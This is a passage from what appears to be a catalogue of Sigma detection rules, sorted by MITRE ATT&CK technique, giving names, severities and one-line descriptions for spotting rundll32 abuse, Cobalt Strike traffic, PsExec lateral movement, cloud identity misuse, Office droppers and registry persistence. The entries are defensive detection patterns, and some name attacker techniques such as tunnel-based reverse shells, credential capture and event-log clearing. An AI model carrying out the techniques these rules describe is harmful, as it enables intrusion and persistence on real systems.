  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - F-Secure C3 Load by Rundll32 - Level: critical
    Description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
  • CobaltStrike Load by Rundll32 - Level: high
    Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
  • HackTool - RedMimicry Winnti Playbook Execution - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
  • Code Execution via Pcwutl.dll - Level: medium
    Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
  • Rundll32 InstallScreenSaver Execution - Level: medium
    Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
  • Suspicious Rundll32 Setupapi.dll Activity - Level: medium
    Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
  • Shell32 DLL Execution in Suspicious Directory - Level: high
    Description: Detects shell32.dll executing a DLL in a suspicious directory
  • RunDLL32 Spawning Explorer - Level: high
    Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
  • Potentially Suspicious Rundll32 Activity - Level: medium
    Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
  • Suspicious Control Panel DLL Load - Level: high
    Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
  • Suspicious Rundll32 Execution With Image Extension - Level: high
    Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
  • Suspicious ShellExec_RunDLL Call Via Ordinal - Level: high
    Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands. Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
  • Suspicious Rundll32 Activity Invoking Sys File - Level: high
    Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
  • Potentially Suspicious Rundll32.EXE Execution of UDL File - Level: medium
    Description: Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
  • Rundll32 Execution With Uncommon DLL Extension - Level: medium
    Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
  • Rundll32 UNC Path Execution - Level: high
    Description: Detects rundll32 execution where the DLL is located on a remote location (share)
  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments - Level: high
    Description: Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
  • Potential PowerShell Execution Via DLL - Level: high
    Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine.
  • ScreenSaver Registry Key Set - Level: medium
    Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
  • ZxShell Malware - Level: critical
    Description: Detects a ZxShell start by the called and well-known function name
  • Fireball Archer Install - Level: high
    Description: Detects Archer malware invocation via rundll32
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
  • APT29 2018 Phishing Campaign File Indicators - Level: critical
    Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
  • APT29 2018 Phishing Campaign CommandLine Indicators - Level: critical
    Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
  • Equation Group DLL_U Export Function Load - Level: critical
    Description: Detects a specific export function name used by one of EquationGroup tools
  • Potential Emotet Rundll32 Execution - Level: critical
    Description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
  • EvilNum APT Golden Chickens Deployment Via OCX Files - Level: critical
    Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
  • Potential Bumblebee Remote Thread Creation - Level: high
    Description: Detects remote thread injection events based on action seen used by bumblebee
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 - Level: high
    Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE - Level: medium
    Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
  • Kapeka Backdoor Loaded Via Rundll32.EXE - Level: high
    Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
  • Kapeka Backdoor Execution Via RunDLL32.EXE - Level: high
    Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
  • Potential Raspberry Robin CPL Execution Activity - Level: high
    Description: Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants.
  • DLL Call by Ordinal Via Rundll32.EXE - Level: medium
    Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll.
attack.t1071.001 42
Show Rules (42)
  • CobaltStrike Malleable Amazon Browsing Traffic Profile - Level: high
    Description: Detects Malleable Amazon Profile
  • CobaltStrike Malformed UAs in Malleable Profiles - Level: critical
    Description: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
  • CobaltStrike Malleable (OCSP) Profile - Level: high
    Description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
  • CobaltStrike Malleable OneDrive Browsing Traffic Profile - Level: high
    Description: Detects Malleable OneDrive Profile
  • Suspicious Curl Change User Agents - Linux - Level: medium
    Description: Detects a suspicious curl process start on linux with set useragent options
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
  • Wannacry Killswitch Domain - Level: high
    Description: Detects wannacry killswitch domain dns queries
  • Windows WebDAV User Agent - Level: high
    Description: Detects WebDav DownloadCradle
  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy - Level: high
    Description: Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).
  • HackTool - BabyShark Agent Default URL Pattern - Level: critical
    Description: Detects Baby Shark C2 Framework default communication patterns
  • HackTool - Empire UserAgent URI Combo - Level: high
    Description: Detects user agent and URI paths used by empire agents
  • PwnDrp Access - Level: critical
    Description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
  • Raw Paste Service Access - Level: high
    Description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
  • Telegram API Access - Level: medium
    Description: Detects suspicious requests to Telegram API without the usual Telegram User-Agent
  • APT User Agent - Level: high
    Description: Detects suspicious user agent strings used in APT malware in proxy logs
  • Suspicious Base64 Encoded User-Agent - Level: medium
    Description: Detects suspicious encoded User-Agent strings, as seen used by some malware.
  • Bitsadmin to Uncommon IP Server Address - Level: high
    Description: Detects Bitsadmin connections to IP addresses instead of FQDN names
  • Bitsadmin to Uncommon TLD - Level: high
    Description: Detects Bitsadmin connections to domains with uncommon TLDs
  • Crypto Miner User Agent - Level: high
    Description: Detects suspicious user agent strings used by crypto miners in proxy logs
  • HTTP Request With Empty User Agent - Level: medium
    Description: Detects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
  • Exploit Framework User Agent - Level: high
    Description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
  • Malware User Agent - Level: high
    Description: Detects suspicious user agent strings used by malware in proxy logs
  • Windows PowerShell User Agent - Level: medium
    Description: Detects Windows PowerShell Web Access
  • Suspicious User Agent - Level: high
    Description: Detects suspicious malformed user agent strings in proxy logs
  • Potential Base64 Encoded User-Agent - Level: medium
    Description: Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
  • Cloudflared Tunnels Related DNS Requests - Level: medium
    Description: Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • DNS Query To Devtunnels Domain - Level: medium
    Description: Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • DNS Query Request By QuickAssist.EXE - Level: low
    Description: Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.
  • DNS Query To Visual Studio Code Tunnels Domain - Level: medium
    Description: Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
  • Outbound Network Connection Initiated By Microsoft Dialer - Level: high
    Description: Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
  • Change User Agents with WebRequest - Level: medium
    Description: Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
  • Visual Studio Code Tunnel Execution - Level: medium
    Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
  • Visual Studio Code Tunnel Shell Execution - Level: medium
    Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
  • Renamed Visual Studio Code Tunnel Execution - Level: high
    Description: Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
  • Visual Studio Code Tunnel Service Installation - Level: medium
    Description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
  • Chafer Malware URL Pattern - Level: high
    Description: Detects HTTP request used by Chafer malware to receive data from its C2.
  • Ursnif Malware C2 URL Pattern - Level: critical
    Description: Detects Ursnif C2 traffic.
  • Ursnif Malware Download URL Pattern - Level: high
    Description: Detects download of Ursnif malware done by dropper documents.
  • APT40 Dropbox Tool User Agent - Level: high
    Description: Detects suspicious user agent string of APT40 Dropbox tool
  • ComRAT Network Communication - Level: high
    Description: Detects Turla ComRAT network communication.
  • Curl.EXE Execution With Custom UserAgent - Level: medium
    Description: Detects execution of curl.exe with custom useragent options
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
attack.t1021.002 41
Show Rules (41)
  • PsExec Pipes Artifacts - Level: medium
    Description: Detecting use PsExec via Pipe Creation/Access to pipes
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon - Level: critical
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network and loading it for a DCOM InternetExplorer DLL Hijack scenario.
  • SMB Spoolss Name Piped Usage - Level: medium
    Description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
  • First Time Seen Remote Named Pipe - Zeek - Level: high
    Description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes
  • Suspicious PsExec Execution - Zeek - Level: high
    Description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
  • Access To ADMIN$ Network Share - Level: low
    Description: Detects access to ADMIN$ network share
  • CobaltStrike Service Installations - Security - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
  • DCERPC SMB Spoolss Named Pipe - Level: medium
    Description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security - Level: high
    Description: Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.
  • Impacket PsExec Execution - Level: high
    Description: Detects execution of Impacket's psexec.py.
  • First Time Seen Remote Named Pipe - Level: high
    Description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes
  • Metasploit SMB Authentication - Level: high
    Description: Alerts on Metasploit host's authentications on the domain.
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • Protected Storage Service Access - Level: high
    Description: Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers
  • SMB Create Remote File Admin Share - Level: high
    Description: Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).
  • Suspicious PsExec Execution - Level: high
    Description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
  • Remote Service Activity via SVCCTL Named Pipe - Level: medium
    Description: Detects remote service activity via remote access to the svcctl named pipe
  • T1047 Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario.
  • CobaltStrike Service Installations - System - Level: critical
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
  • smbexec.py Service Installation - Level: high
    Description: Detects the use of smbexec.py tool by detecting a specific service installation
  • Potential DCOM InternetExplorer.Application DLL Hijack - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
  • Wmiprvse Wbemcomn DLL Hijack - File - Level: critical
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load - Level: critical
    Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
  • Wmiprvse Wbemcomn DLL Hijack - Level: high
    Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
  • PUA - CSExec Default Named Pipe - Level: medium
    Description: Detects default CSExec pipe creation
  • PUA - RemCom Default Named Pipe - Level: medium
    Description: Detects default RemCom pipe creation
  • Suspicious New-PSDrive to Admin Share - Level: medium
    Description: Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
  • HackTool - SharpMove Tool Execution - Level: high
    Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
  • Windows Admin Share Mount Via Net.EXE - Level: medium
    Description: Detects when an admin share is mounted using net.exe
  • Password Provided In Command Line Of Net.EXE - Level: medium
    Description: Detects a when net.exe is called with a password in the command line
  • Windows Internet Hosted WebDav Share Mount Via Net.EXE - Level: high
    Description: Detects when an internet hosted webdav share is mounted using the "net.exe" utility
  • Windows Share Mount Via Net.EXE - Level: low
    Description: Detects when a share is mounted using the "net.exe" utility
  • Rundll32 UNC Path Execution - Level: high
    Description: Detects rundll32 execution where the DLL is located on a remote location (share)
  • Rundll32 Execution Without Parameters - Level: high
    Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
  • Copy From Or To Admin Share Or Sysvol Folder - Level: medium
    Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
  • Potential CobaltStrike Service Installations - Registry - Level: high
    Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
  • Metasploit Or Impacket Service Installation Via SMB PsExec - Level: high
    Description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation
  • Failed Mounting of Hidden Share - Level: medium
    Description: Detects repeated failed (outgoing) attempts to mount a hidden share
attack.t1078.004 38
Show Rules (38)
  • AWS SAML Provider Deletion Activity - Level: medium
    Description: Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation - Level: high
    Description: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
  • AWS IAM S3Browser LoginProfile Creation - Level: high
    Description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
  • AWS IAM S3Browser User or AccessKey Creation - Level: high
    Description: Detects S3 Browser utility creating IAM User or AccessKey.
  • AWS Root Credentials - Level: medium
    Description: Detects AWS root account usage
  • Azure Subscription Permission Elevation Via ActivityLogs - Level: high
    Description: Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.
  • Bitlocker Key Retrieval - Level: medium
    Description: Monitor and alert for Bitlocker key retrieval.
  • Users Added to Global or Device Admin Roles - Level: high
    Description: Monitor and alert for users added to device admin roles.
  • Application AppID Uri Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an applications AppID URI.
  • Application URI Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an applications URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
  • Guest User Invited By Non Approved Inviters - Level: medium
    Description: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.
  • User State Changed From Guest To Member - Level: medium
    Description: Detects the change of user type from "Guest" to "Member" for potential elevation of privilege.
  • PIM Approvals And Deny Elevation - Level: high
    Description: Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.
  • Changes To PIM Settings - Level: high
    Description: Detects when changes are made to PIM roles
  • User Added To Privilege Role - Level: high
    Description: Detects when a user is added to a privileged role.
  • Privileged Account Creation - Level: medium
    Description: Detects when a new admin is created.
  • Temporary Access Pass Added To An Account - Level: high
    Description: Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated
  • Password Reset By User Account - Level: medium
    Description: Detect when a user has reset their password in Azure AD
  • Successful Authentications From Countries You Do Not Operate Out Of - Level: medium
    Description: Detect successful authentications from countries you do not operate out of.
  • Failed Authentications From Countries You Do Not Operate Out Of - Level: low
    Description: Detect failed authentications from countries you do not operate out of.
  • Device Registration or Join Without MFA - Level: medium
    Description: Monitor and alert for device registration or join events where MFA was not performed.
  • Azure AD Only Single Factor Authentication Required - Level: low
    Description: Detect when users are authenticating without MFA being required.
  • Sign-ins from Non-Compliant Devices - Level: high
    Description: Monitor and alert for sign-ins where the device was non-compliant.
  • Sign-ins by Unknown Devices - Level: low
    Description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.
  • Potential MFA Bypass Using Legacy Client Authentication - Level: high
    Description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.
  • Account Disabled or Blocked for Sign in Attempts - Level: medium
    Description: Detects when an account is disabled or blocked for sign in but tried to log in
  • Sign-in Failure Due to Conditional Access Requirements Not Met - Level: high
    Description: Define a baseline threshold for failed sign-ins due to Conditional Access failures
  • Use of Legacy Authentication Protocols - Level: high
    Description: Alert on when legacy authentication has been used on an account
  • Login to Disabled Account - Level: medium
    Description: Detect failed attempts to sign in to disabled accounts.
  • Multifactor Authentication Denied - Level: medium
    Description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.
  • Multifactor Authentication Interrupted - Level: medium
    Description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.
  • Users Authenticating To Other Azure AD Tenants - Level: medium
    Description: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.
  • User Access Blocked by Azure Conditional Access - Level: medium
    Description: Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
  • Bitbucket User Login Failure - Level: medium
    Description: Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
  • Github New Secret Created - Level: low
    Description: Detects when a user creates action secret for the organization, environment, codespaces or repository.
  • Github Self Hosted Runner Changes Detected - Level: low
    Description: A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
  • Github SSH Certificate Configuration Changed - Level: medium
    Description: Detects when changes are made to the SSH certificate configuration of the organization.
  • Okta New Admin Console Behaviours - Level: high
    Description: Detects when Okta identifies new activity in the Admin Console.
attack.t1204.002 37
Show Rules (37)
  • New Lolbin Process by Office Applications - Level: high
    Description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
  • Excel Proxy Executing Regsvr32 With Payload - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
  • Excel Proxy Executing Regsvr32 With Payload Alternate - Level: high
    Description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
  • Office Applications Spawning Wmi Cli Alternate - Level: high
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • WMI Execution Via Office Process - Level: medium
    Description: Initial execution of malicious document calls wmic to execute the file with regsvr32
  • Suspicious Microsoft Office Child Process - MacOS - Level: high
    Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
  • Download From Suspicious TLD - Blacklist - Level: low
    Description: Detects download of certain file types from hosts in suspicious TLDs
  • Download From Suspicious TLD - Whitelist - Level: low
    Description: Detects executable downloads from suspicious remote systems
  • Flash Player Update from Suspicious Location - Level: high
    Description: Detects a flashplayer update from an unofficial location
  • File Was Not Allowed To Run - Level: medium
    Description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.
  • File With Uncommon Extension Created By An Office Application - Level: high
    Description: Detects the creation of files with an executable or script extension by an Office application.
  • CLR DLL Loaded Via Office Applications - Level: medium
    Description: Detects CLR DLL being loaded by an Office Product
  • DotNET Assembly DLL Loaded Via Office Application - Level: medium
    Description: Detects any assembly DLL being loaded by an Office Product
  • Active Directory Parsing DLL Loaded Via Office Application - Level: medium
    Description: Detects DSParse DLL being loaded by an Office Product
  • GAC DLL Loaded Via Office Applications - Level: high
    Description: Detects any GAC DLL being loaded by an Office Product
  • Microsoft Excel Add-In Loaded From Uncommon Location - Level: medium
    Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
  • Active Directory Kerberos DLL Loaded Via Office Application - Level: medium
    Description: Detects Kerberos DLL being loaded by an Office Product
  • Microsoft VBA For Outlook Addin Loaded Via Outlook - Level: medium
    Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
  • VBA DLL Loaded Via Office Application - Level: high
    Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
  • Remote DLL Load Via Rundll32.EXE - Level: medium
    Description: Detects a remote DLL load event via "rundll32.exe".
  • HackTool - LittleCorporal Generated Maldoc Injection - Level: high
    Description: Detects the process injection of a LittleCorporal generated Maldoc.
  • Suspicious Outlook Child Process - Level: high
    Description: Detects a suspicious process spawning from an Outlook process.
  • Suspicious Binary In User Directory Spawned From Office Application - Level: high
    Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
  • Suspicious Microsoft Office Child Process - Level: high
    Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
  • Potential Suspicious Browser Launch From Document Reader Process - Level: medium
    Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
  • Suspicious WMIC Execution Via Office Process - Level: high
    Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
  • Suspicious WmiPrvSE Child Process - Level: high
    Description: Detects suspicious and uncommon child processes of WmiPrvSE
  • New Application in AppCompat - Level: informational
    Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • Ursnif Malware C2 URL Pattern - Level: critical
    Description: Detects Ursnif C2 traffic.
  • Potential Maze Ransomware Activity - Level: critical
    Description: Detects specific process characteristics of Maze ransomware word document droppers
  • Kapeka Backdoor Loaded Via Rundll32.EXE - Level: high
    Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
  • Microsoft Excel Add-In Loaded - Level: low
    Description: Detects Microsoft Excel loading an Add-In (.xll) file
  • Microsoft Word Add-In Loaded - Level: low
    Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
  • File Creation by Office Applications - Level: high
    Description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.
attack.t1547.001 37
Show Rules (37)
  • Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • File Creation In Suspicious Directory By Msdt.EXE - Level: high
    Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
  • Potential Startup Shortcut Persistence Via PowerShell.EXE - Level: high
    Description: Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
  • Startup Folder File Write - Level: medium
    Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
  • Suspicious Startup Folder Persistence - Level: high
    Description: Detects when a file with a suspicious extension is created in the startup folder
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE - Level: medium
    Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
  • Direct Autorun Keys Modification - Level: medium
    Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • Narrator's Feedback-Hub Persistence - Level: high
    Description: Detects abusing Windows 10 Narrator's Feedback-Hub
  • Suspicious Run Key from Download - Level: high
    Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
  • CurrentVersion Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Common Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Classes Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • CurrentControlSet Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • CurrentVersion NT Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Internet Explorer Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Office Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Session Manager Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • System Scripts Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • WinSock2 Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Wow6432Node CurrentVersion Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Wow6432Node Classes Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Wow6432Node Windows NT CurrentVersion Autorun Keys Modification - Level: medium
    Description: Detects modification of autostart extensibility point (ASEP) in registry.
  • Suspicious Powershell In Registry Run Keys - Level: medium
